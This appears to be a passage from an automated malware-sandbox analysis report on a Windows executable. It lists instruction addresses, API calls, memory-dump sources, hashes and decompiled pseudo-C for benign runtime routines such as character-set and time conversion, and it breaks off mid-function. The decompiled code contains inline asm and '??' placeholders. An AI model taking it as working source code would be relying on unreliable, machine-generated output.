                                                                                                                0x00ed1442
                                                                                                                0x00ed1446
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1448
                                                                                                                0x00ed1448
                                                                                                                0x00ed144b
                                                                                                                0x00ed144d
                                                                                                                0x00ed1450
                                                                                                                0x00000000
                                                                                                                0x00ed1456
                                                                                                                0x00ed145f
                                                                                                                0x00000000
                                                                                                                0x00ed145f
                                                                                                                0x00ed1450
                                                                                                                0x00000000
                                                                                                                0x00ed15fb
                                                                                                                0x00ed15fb
                                                                                                                0x00ed15fc
                                                                                                                0x00ed1601
                                                                                                                0x00ed1603
                                                                                                                0x00ed1606
                                                                                                                0x00ed1606
                                                                                                                0x00000000
                                                                                                                0x00ed163c
                                                                                                                0x00ed163c
                                                                                                                0x00ed1643
                                                                                                                0x00ed1645
                                                                                                                0x00ed1645
                                                                                                                0x00ed1647
                                                                                                                0x00ed1676
                                                                                                                0x00ed1676
                                                                                                                0x00ed167c
                                                                                                                0x00000000
                                                                                                                0x00ed167c
                                                                                                                0x00ed1649
                                                                                                                0x00ed1649
                                                                                                                0x00ed1649
                                                                                                                0x00ed164c
                                                                                                                0x00ed1665
                                                                                                                0x00ed1665
                                                                                                                0x00ed166b
                                                                                                                0x00ed166b
                                                                                                                0x00000000
                                                                                                                0x00ed166b
                                                                                                                0x00ed164e
                                                                                                                0x00ed164e
                                                                                                                0x00ed164e
                                                                                                                0x00ed1651
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1653
                                                                                                                0x00ed1653
                                                                                                                0x00ed1653
                                                                                                                0x00ed1656
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed165c
                                                                                                                0x00ed165c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed16c9
                                                                                                                0x00ed16c9
                                                                                                                0x00ed16cc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed16ce
                                                                                                                0x00ed16ce
                                                                                                                0x00ed16da
                                                                                                                0x00ed16df
                                                                                                                0x00ed16e0
                                                                                                                0x00ed16e1
                                                                                                                0x00ed16e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed16e5
                                                                                                                0x00ed16e5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed18d7
                                                                                                                0x00ed18d7
                                                                                                                0x00ed18da
                                                                                                                0x00ed18dc
                                                                                                                0x00ed18e3
                                                                                                                0x00ed18e5
                                                                                                                0x00ed18eb
                                                                                                                0x00ed18ec
                                                                                                                0x00ed18f1
                                                                                                                0x00ed18f2
                                                                                                                0x00ed18f2
                                                                                                                0x00ed18f7
                                                                                                                0x00ed18fa
                                                                                                                0x00ed1900
                                                                                                                0x00ed1900
                                                                                                                0x00ed1905
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1911
                                                                                                                0x00ed1911
                                                                                                                0x00ed1914
                                                                                                                0x00ed16f5
                                                                                                                0x00ed16f5
                                                                                                                0x00000000
                                                                                                                0x00ed16f5
                                                                                                                0x00ed191a
                                                                                                                0x00ed191a
                                                                                                                0x00ed16e6
                                                                                                                0x00ed16e6
                                                                                                                0x00ed16ec
                                                                                                                0x00ed16ed
                                                                                                                0x00ed16f0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1921
                                                                                                                0x00ed1921
                                                                                                                0x00ed1924
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed192a
                                                                                                                0x00ed192a
                                                                                                                0x00ed192c
                                                                                                                0x00ed1933
                                                                                                                0x00ed193b
                                                                                                                0x00ed1941
                                                                                                                0x00ed1946
                                                                                                                0x00ed1949
                                                                                                                0x00ed197e
                                                                                                                0x00ed1983
                                                                                                                0x00ed1989
                                                                                                                0x00ed198a
                                                                                                                0x00ed198f
                                                                                                                0x00ed194b
                                                                                                                0x00ed194b
                                                                                                                0x00ed194e
                                                                                                                0x00ed1954
                                                                                                                0x00ed196a
                                                                                                                0x00ed196f
                                                                                                                0x00ed1970
                                                                                                                0x00ed1975
                                                                                                                0x00ed1956
                                                                                                                0x00ed1956
                                                                                                                0x00ed195b
                                                                                                                0x00ed195c
                                                                                                                0x00ed1961
                                                                                                                0x00ed1961
                                                                                                                0x00ed1954
                                                                                                                0x00ed1996
                                                                                                                0x00ed1998
                                                                                                                0x00ed199f
                                                                                                                0x00ed19ad
                                                                                                                0x00ed19b4
                                                                                                                0x00ed19b9
                                                                                                                0x00ed19ba
                                                                                                                0x00ed19bb
                                                                                                                0x00ed19bd
                                                                                                                0x00ed19be
                                                                                                                0x00ed19c5
                                                                                                                0x00ed1a0e
                                                                                                                0x00ed1a15
                                                                                                                0x00ed1a1a
                                                                                                                0x00ed1a1c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1a22
                                                                                                                0x00ed1a22
                                                                                                                0x00ed1a24
                                                                                                                0x00ed1a2a
                                                                                                                0x00ed1a31
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1a33
                                                                                                                0x00ed1a33
                                                                                                                0x00ed1a35
                                                                                                                0x00ed1a36
                                                                                                                0x00ed1a36
                                                                                                                0x00ed1a36
                                                                                                                0x00ed1a39
                                                                                                                0x00ed1a3c
                                                                                                                0x00ed1a46
                                                                                                                0x00ed1a46
                                                                                                                0x00ed1a48
                                                                                                                0x00ed1a4a
                                                                                                                0x00ed1a54
                                                                                                                0x00ed1a59
                                                                                                                0x00ed1a5b
                                                                                                                0x00ed1a99
                                                                                                                0x00ed1a99
                                                                                                                0x00ed1a9c
                                                                                                                0x00ed1a9c
                                                                                                                0x00ed1a9e
                                                                                                                0x00ed1a9f
                                                                                                                0x00ed1a9f
                                                                                                                0x00000000
                                                                                                                0x00ed1a9f
                                                                                                                0x00ed1a5d
                                                                                                                0x00ed1a5d
                                                                                                                0x00ed1a5f
                                                                                                                0x00ed1a60
                                                                                                                0x00ed1a62
                                                                                                                0x00ed1a65
                                                                                                                0x00ed1a7a
                                                                                                                0x00ed1a7a
                                                                                                                0x00ed1a7c
                                                                                                                0x00ed1a7d
                                                                                                                0x00ed1a7d
                                                                                                                0x00ed1a7d
                                                                                                                0x00ed1a80
                                                                                                                0x00ed1a80
                                                                                                                0x00ed1a85
                                                                                                                0x00ed1a86
                                                                                                                0x00ed1a8c
                                                                                                                0x00ed1a8c
                                                                                                                0x00ed1a8d
                                                                                                                0x00ed1a92
                                                                                                                0x00ed1a93
                                                                                                                0x00ed1a94
                                                                                                                0x00000000
                                                                                                                0x00ed1a94
                                                                                                                0x00ed1a67
                                                                                                                0x00ed1a67
                                                                                                                0x00ed1a6e
                                                                                                                0x00ed1a71
                                                                                                                0x00ed1a72
                                                                                                                0x00000000
                                                                                                                0x00ed1a72
                                                                                                                0x00ed1a3e
                                                                                                                0x00ed1a3e
                                                                                                                0x00ed1a40
                                                                                                                0x00ed1a41
                                                                                                                0x00ed1a44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1aa1
                                                                                                                0x00ed1aa1
                                                                                                                0x00ed1aa4
                                                                                                                0x00ed1aa4
                                                                                                                0x00ed1aa9
                                                                                                                0x00ed1aab
                                                                                                                0x00ed1aad
                                                                                                                0x00ed1aad
                                                                                                                0x00ed1aaf
                                                                                                                0x00ed1aaf
                                                                                                                0x00000000
                                                                                                                0x00ed19c7
                                                                                                                0x00ed19c7
                                                                                                                0x00ed19ce
                                                                                                                0x00ed19da
                                                                                                                0x00ed19e0
                                                                                                                0x00ed19e1
                                                                                                                0x00ed19e2
                                                                                                                0x00ed19e7
                                                                                                                0x00ed19ea
                                                                                                                0x00ed19ec
                                                                                                                0x00ed19f2
                                                                                                                0x00ed19f4
                                                                                                                0x00ed1a02
                                                                                                                0x00ed1a07
                                                                                                                0x00ed1a08
                                                                                                                0x00ed1a08
                                                                                                                0x00ed1ab2
                                                                                                                0x00ed1ab2
                                                                                                                0x00ed1aba
                                                                                                                0x00ed1abf
                                                                                                                0x00ed1ac9
                                                                                                                0x00ed1ad0
                                                                                                                0x00ed1ad0
                                                                                                                0x00ed1add
                                                                                                                0x00ed1ae4
                                                                                                                0x00ed1ae9
                                                                                                                0x00ed1af1
                                                                                                                0x00ed1afd
                                                                                                                0x00ed1afd
                                                                                                                0x00ed1b0a
                                                                                                                0x00ed1b0f
                                                                                                                0x00ed1b17
                                                                                                                0x00ed1b21
                                                                                                                0x00ed1b2e
                                                                                                                0x00ed1b35
                                                                                                                0x00ed1b35
                                                                                                                0x00ed1b41
                                                                                                                0x00ed1b48
                                                                                                                0x00ed1b4d
                                                                                                                0x00ed1b55
                                                                                                                0x00ed1b5b
                                                                                                                0x00ed1b5c
                                                                                                                0x00ed1b5d
                                                                                                                0x00ed1b5f
                                                                                                                0x00ed1b5f
                                                                                                                0x00ed1b74
                                                                                                                0x00ed1b79
                                                                                                                0x00ed1b85
                                                                                                                0x00ed1b87
                                                                                                                0x00ed1b98
                                                                                                                0x00ed1ba5
                                                                                                                0x00000000
                                                                                                                0x00ed1b89
                                                                                                                0x00ed1b89
                                                                                                                0x00ed1b94
                                                                                                                0x00ed1b96
                                                                                                                0x00ed1baa
                                                                                                                0x00ed1baa
                                                                                                                0x00ed1bac
                                                                                                                0x00ed1bb2
                                                                                                                0x00ed1bb8
                                                                                                                0x00ed1bc6
                                                                                                                0x00ed1bcb
                                                                                                                0x00ed1bcc
                                                                                                                0x00ed1bd4
                                                                                                                0x00ed1bd9
                                                                                                                0x00ed1be0
                                                                                                                0x00ed1be6
                                                                                                                0x00ed1be8
                                                                                                                0x00ed1bee
                                                                                                                0x00ed1bf4
                                                                                                                0x00ed1bf6
                                                                                                                0x00ed1bff
                                                                                                                0x00ed1c02
                                                                                                                0x00ed1c04
                                                                                                                0x00ed1c0d
                                                                                                                0x00ed1c10
                                                                                                                0x00ed1c16
                                                                                                                0x00ed1c19
                                                                                                                0x00ed1c22
                                                                                                                0x00ed1c31
                                                                                                                0x00ed1c36
                                                                                                                0x00ed1c3e
                                                                                                                0x00ed1c40
                                                                                                                0x00ed1c41
                                                                                                                0x00ed1c47
                                                                                                                0x00ed1c48
                                                                                                                0x00ed1c4a
                                                                                                                0x00ed1c4f
                                                                                                                0x00ed1c4f
                                                                                                                0x00000000
                                                                                                                0x00ed1c3e
                                                                                                                0x00000000
                                                                                                                0x00ed1b96
                                                                                                                0x00ed1b87
                                                                                                                0x00000000
                                                                                                                0x00ed1c57
                                                                                                                0x00ed1c57
                                                                                                                0x00ed1c5a
                                                                                                                0x00ed1c5c
                                                                                                                0x00ed1c5c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1688
                                                                                                                0x00ed1688
                                                                                                                0x00ed1690
                                                                                                                0x00ed1696
                                                                                                                0x00ed1699
                                                                                                                0x00ed16bd
                                                                                                                0x00ed169b
                                                                                                                0x00ed169b
                                                                                                                0x00ed169e
                                                                                                                0x00ed16b1
                                                                                                                0x00ed16a0
                                                                                                                0x00ed16a0
                                                                                                                0x00ed16a2
                                                                                                                0x00ed16a7
                                                                                                                0x00ed16a7
                                                                                                                0x00ed169e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1701
                                                                                                                0x00ed1701
                                                                                                                0x00ed1702
                                                                                                                0x00ed1707
                                                                                                                0x00ed1707
                                                                                                                0x00ed1707
                                                                                                                0x00ed170a
                                                                                                                0x00ed170f
                                                                                                                0x00ed1715
                                                                                                                0x00ed1715
                                                                                                                0x00ed171b
                                                                                                                0x00ed1721
                                                                                                                0x00ed1721
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1118
                                                                                                                0x00ed111a
                                                                                                                0x00ed111f
                                                                                                                0x00ed1125
                                                                                                                0x00ed1128
                                                                                                                0x00000000
                                                                                                                0x00ed112a
                                                                                                                0x00ed112a
                                                                                                                0x00000000
                                                                                                                0x00ed112a
                                                                                                                0x00ed1128
                                                                                                                0x00ed1c94
                                                                                                                0x00ed1c9a
                                                                                                                0x00ed1ca4
                                                                                                                0x00ed1ca4
                                                                                                                0x00ed17a9
                                                                                                                0x00ed17a9
                                                                                                                0x00ed17b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed17b6
                                                                                                                0x00ed17b6
                                                                                                                0x00ed17b8
                                                                                                                0x00ed17bf
                                                                                                                0x00ed17c7
                                                                                                                0x00ed17c8
                                                                                                                0x00ed17cd
                                                                                                                0x00ed17ce
                                                                                                                0x00ed17cf
                                                                                                                0x00ed17d1
                                                                                                                0x00ed1825
                                                                                                                0x00ed1825
                                                                                                                0x00ed182d
                                                                                                                0x00ed183b
                                                                                                                0x00ed184c
                                                                                                                0x00ed185a
                                                                                                                0x00ed185a
                                                                                                                0x00ed1866
                                                                                                                0x00ed186b
                                                                                                                0x00ed186d
                                                                                                                0x00ed187d
                                                                                                                0x00ed1887
                                                                                                                0x00ed188c
                                                                                                                0x00ed188f
                                                                                                                0x00000000
                                                                                                                0x00ed1895
                                                                                                                0x00ed1895
                                                                                                                0x00ed189a
                                                                                                                0x00ed189a
                                                                                                                0x00ed189c
                                                                                                                0x00ed18a3
                                                                                                                0x00ed18a9
                                                                                                                0x00000000
                                                                                                                0x00ed18a9
                                                                                                                0x00ed188f
                                                                                                                0x00ed17d3
                                                                                                                0x00ed17d5
                                                                                                                0x00ed17d7
                                                                                                                0x00ed17de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed17e0
                                                                                                                0x00ed17e0
                                                                                                                0x00ed17e2
                                                                                                                0x00ed17e8
                                                                                                                0x00ed17e8
                                                                                                                0x00ed17e8
                                                                                                                0x00ed17ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed17ee
                                                                                                                0x00ed17ee
                                                                                                                0x00ed17ef
                                                                                                                0x00ed17f5
                                                                                                                0x00ed17f8
                                                                                                                0x00ed17fa
                                                                                                                0x00ed17fd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed17ff
                                                                                                                0x00000000
                                                                                                                0x00ed17ff
                                                                                                                0x00ed1801
                                                                                                                0x00ed180c
                                                                                                                0x00ed1816
                                                                                                                0x00ed181b
                                                                                                                0x00ed181b
                                                                                                                0x00ed181d
                                                                                                                0x00000000
                                                                                                                0x00ed18af
                                                                                                                0x00ed18af
                                                                                                                0x00ed18b2
                                                                                                                0x00ed18b8
                                                                                                                0x00ed18bf
                                                                                                                0x00ed18c1
                                                                                                                0x00ed18c1
                                                                                                                0x00ed18cb
                                                                                                                0x00ed18cb
                                                                                                                0x00000000
                                                                                                                0x00ed18b2

                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNELBASE(00000800,?), ref: 00ED1741
                                                                                                                • _swprintf.LIBCMT ref: 00ED1775
                                                                                                                  • Part of subcall function 00EC37E6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00EC37F9
                                                                                                                • SetDlgItemTextW.USER32(?,00000066,00F0DA6A), ref: 00ED1795
                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00ED17C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                                                • String ID: Ht>*$%s%s%u
                                                                                                                • API String ID: 4234722753-120414845
                                                                                                                • Opcode ID: 37a7359347f12bdc9c27f69135b56a940d6187c20670a069780b6fd1b647f66c
                                                                                                                • Instruction ID: e66c1250929407b13e1b34ce75a55ff058b33241af3930b13d128940289081ac
                                                                                                                • Opcode Fuzzy Hash: 37a7359347f12bdc9c27f69135b56a940d6187c20670a069780b6fd1b647f66c
                                                                                                                • Instruction Fuzzy Hash: 21419D72900219AEEF25DB60CD84FEE77B8EB04708F0050EBF509F6191EA759B869F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDF131, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E00EDF131(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xef1558; // 0xf529bb33
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00EE377D(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00ED3C6A(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00EDF399(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00EDF7FC(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00EDF399(_t101);
									goto L36;
								}
								_t62 = E00EDF7FC(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00EDF399(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00EDD5E4(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00EE6AE0();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00EDF7FC(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00EDD5E4(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00EE6AE0();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























                                                                                                                0x00edf136
                                                                                                                0x00edf137
                                                                                                                0x00edf138
                                                                                                                0x00edf13f
                                                                                                                0x00edf143
                                                                                                                0x00edf144
                                                                                                                0x00edf14a
                                                                                                                0x00edf150
                                                                                                                0x00edf156
                                                                                                                0x00edf159
                                                                                                                0x00edf159
                                                                                                                0x00edf15c
                                                                                                                0x00edf15e
                                                                                                                0x00edf15e
                                                                                                                0x00edf15c
                                                                                                                0x00edf160
                                                                                                                0x00edf165
                                                                                                                0x00edf16c
                                                                                                                0x00edf16f
                                                                                                                0x00edf16f
                                                                                                                0x00edf18b
                                                                                                                0x00edf191
                                                                                                                0x00edf196
                                                                                                                0x00edf329
                                                                                                                0x00edf33c
                                                                                                                0x00edf19c
                                                                                                                0x00edf19c
                                                                                                                0x00edf19f
                                                                                                                0x00edf1a4
                                                                                                                0x00edf1a8
                                                                                                                0x00edf1fc
                                                                                                                0x00edf1fc
                                                                                                                0x00edf1fe
                                                                                                                0x00edf200
                                                                                                                0x00edf31e
                                                                                                                0x00edf31e
                                                                                                                0x00edf320
                                                                                                                0x00edf321
                                                                                                                0x00000000
                                                                                                                0x00edf327
                                                                                                                0x00edf211
                                                                                                                0x00edf217
                                                                                                                0x00edf219
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf21f
                                                                                                                0x00edf231
                                                                                                                0x00edf236
                                                                                                                0x00edf23a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf247
                                                                                                                0x00edf281
                                                                                                                0x00edf284
                                                                                                                0x00edf287
                                                                                                                0x00edf289
                                                                                                                0x00edf28b
                                                                                                                0x00edf28d
                                                                                                                0x00edf2d9
                                                                                                                0x00edf2d9
                                                                                                                0x00edf2db
                                                                                                                0x00edf2db
                                                                                                                0x00edf2dd
                                                                                                                0x00edf317
                                                                                                                0x00edf318
                                                                                                                0x00000000
                                                                                                                0x00edf31d
                                                                                                                0x00edf2f1
                                                                                                                0x00edf2f6
                                                                                                                0x00edf2f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf2fc
                                                                                                                0x00edf2fd
                                                                                                                0x00edf2fe
                                                                                                                0x00edf301
                                                                                                                0x00edf33d
                                                                                                                0x00edf340
                                                                                                                0x00edf303
                                                                                                                0x00edf303
                                                                                                                0x00edf304
                                                                                                                0x00edf304
                                                                                                                0x00edf311
                                                                                                                0x00edf313
                                                                                                                0x00edf315
                                                                                                                0x00edf346
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf315
                                                                                                                0x00edf28f
                                                                                                                0x00edf292
                                                                                                                0x00edf294
                                                                                                                0x00edf296
                                                                                                                0x00edf298
                                                                                                                0x00edf29b
                                                                                                                0x00edf2a0
                                                                                                                0x00edf2bb
                                                                                                                0x00edf2bd
                                                                                                                0x00edf2c7
                                                                                                                0x00edf2c9
                                                                                                                0x00edf2ca
                                                                                                                0x00edf2cc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf2ce
                                                                                                                0x00edf2d4
                                                                                                                0x00edf2d4
                                                                                                                0x00000000
                                                                                                                0x00edf2d4
                                                                                                                0x00edf2a2
                                                                                                                0x00edf2a4
                                                                                                                0x00edf2a8
                                                                                                                0x00edf2ad
                                                                                                                0x00edf2af
                                                                                                                0x00edf2b1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf2b3
                                                                                                                0x00000000
                                                                                                                0x00edf2b3
                                                                                                                0x00edf249
                                                                                                                0x00edf24e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf254
                                                                                                                0x00edf256
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf26d
                                                                                                                0x00edf272
                                                                                                                0x00edf276
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf27c
                                                                                                                0x00edf1af
                                                                                                                0x00edf1b1
                                                                                                                0x00edf1b3
                                                                                                                0x00edf1bb
                                                                                                                0x00edf1da
                                                                                                                0x00edf1dc
                                                                                                                0x00edf1e6
                                                                                                                0x00edf1e8
                                                                                                                0x00edf1e9
                                                                                                                0x00edf1eb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf1f1
                                                                                                                0x00edf1f7
                                                                                                                0x00edf1f7
                                                                                                                0x00000000
                                                                                                                0x00edf1f7
                                                                                                                0x00edf1bf
                                                                                                                0x00edf1c3
                                                                                                                0x00edf1c8
                                                                                                                0x00edf1cc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf1d2
                                                                                                                0x00000000
                                                                                                                0x00edf1d2

                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00ED9F83,00ED9F83,?,?,?,00EDF382,00000001,00000001,BAE85006), ref: 00EDF18B
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00EDF382,00000001,00000001,BAE85006,?,?,?), ref: 00EDF211
                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,BAE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00EDF30B
                                                                                                                • __freea.LIBCMT ref: 00EDF318
                                                                                                                  • Part of subcall function 00EDD5E4: RtlAllocateHeap.NTDLL(00000000,?,?,?,00ED8A0E,?,0000015D,?,?,?,?,00ED9EEA,000000FF,00000000,?,?), ref: 00EDD616
                                                                                                                • __freea.LIBCMT ref: 00EDF321
                                                                                                                • __freea.LIBCMT ref: 00EDF346
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1414292761-0
                                                                                                                • Opcode ID: 044141f2185ea57f4bc5064bba93417650990729b94cda3bf8e0b2fa0388e9cf
                                                                                                                • Instruction ID: 8863b89970be73130f12eb7fbd53fe04100783d5ac152bae0265eb4f3d9827b4
                                                                                                                • Opcode Fuzzy Hash: 044141f2185ea57f4bc5064bba93417650990729b94cda3bf8e0b2fa0388e9cf
                                                                                                                • Instruction Fuzzy Hash: EA51C072610206AFDB25CF64DC41EAB77A9EB44754F2A523AFC06F7290EB34DC42C690
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC70A4, Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00EC70A4(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				intOrPtr _t47;
				intOrPtr _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v44.wYear =  *_t66;
				_t3 = _t66 + 4; // 0x8b550004
				_v44.wMonth =  *_t3;
				_t5 = _t66 + 8; // 0x48ec83ec
